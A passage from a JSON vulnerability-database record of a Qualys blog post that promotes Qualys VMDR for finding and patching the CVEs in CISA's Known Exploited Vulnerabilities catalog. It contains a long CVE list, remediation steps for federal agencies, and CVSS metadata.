VE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149`,`CVE-2019-13272` ]\n\n\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help your organization to achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any size organization efficiently respond to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? 
Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2010-5326", "CVE-2012-0158", "CVE-2012-0391", "CVE-2012-3152", "CVE-2013-3900", "CVE-2013-3906", "CVE-2014-1761", "CVE-2014-1776", "CVE-2014-1812", "CVE-2015-1635", "CVE-2015-1641", "CVE-2015-4852", "CVE-2016-0167", "CVE-2016-0185", "CVE-2016-3088", "CVE-2016-3235", "CVE-2016-3643", "CVE-2016-3976", "CVE-2016-7255", "CVE-2016-9563", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-11774", "CVE-2017-11882", "CVE-2017-12149", "CVE-2017-5638", "CVE-2017-5689", "CVE-2017-6327", "CVE-2017-7269", "CVE-2017-8464", "CVE-2017-8759", "CVE-2017-9791", "CVE-2017-9805", "CVE-2017-9841", "CVE-2018-0798", "CVE-2018-0802", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-15961", "CVE-2018-15982", "CVE-2018-2380", 
"CVE-2018-4878", "CVE-2018-4939", "CVE-2018-6789", "CVE-2018-7600", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8653", "CVE-2019-0193", "CVE-2019-0211", "CVE-2019-0541", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0752", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0863", "CVE-2019-10149", "CVE-2019-10758", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1214", "CVE-2019-1215", "CVE-2019-13272", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-16759", "CVE-2019-17026", "CVE-2019-17558", "CVE-2019-18187", "CVE-2019-18988", "CVE-2019-2725", "CVE-2019-8394", "CVE-2019-9978", "CVE-2020-0601", "CVE-2020-0646", "CVE-2020-0674", "CVE-2020-0683", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-0878", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-10148", "CVE-2020-10189", "CVE-2020-1020", "CVE-2020-1040", "CVE-2020-1054", "CVE-2020-1147", "CVE-2020-11738", "CVE-2020-11978", "CVE-2020-1350", "CVE-2020-13671", "CVE-2020-1380", "CVE-2020-13927", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-14750", "CVE-2020-14871", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-15505", "CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16013", "CVE-2020-16017", "CVE-2020-17087", "CVE-2020-17144", "CVE-2020-17496", "CVE-2020-17530", "CVE-2020-24557", "CVE-2020-25213", "CVE-2020-2555", "CVE-2020-6207", "CVE-2020-6287", "CVE-2020-6418", "CVE-2020-6572", "CVE-2020-6819", "CVE-2020-6820", "CVE-2020-8243", "CVE-2020-8260", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8599", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-22204", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-30116", 
"CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33766", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35247", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36934", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37415", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40438", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-40539", "CVE-2021-4102", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42292", "CVE-2021-42321", "CVE-2021-43890", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2022-0609", "CVE-2022-21882", "CVE-2022-24086"], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}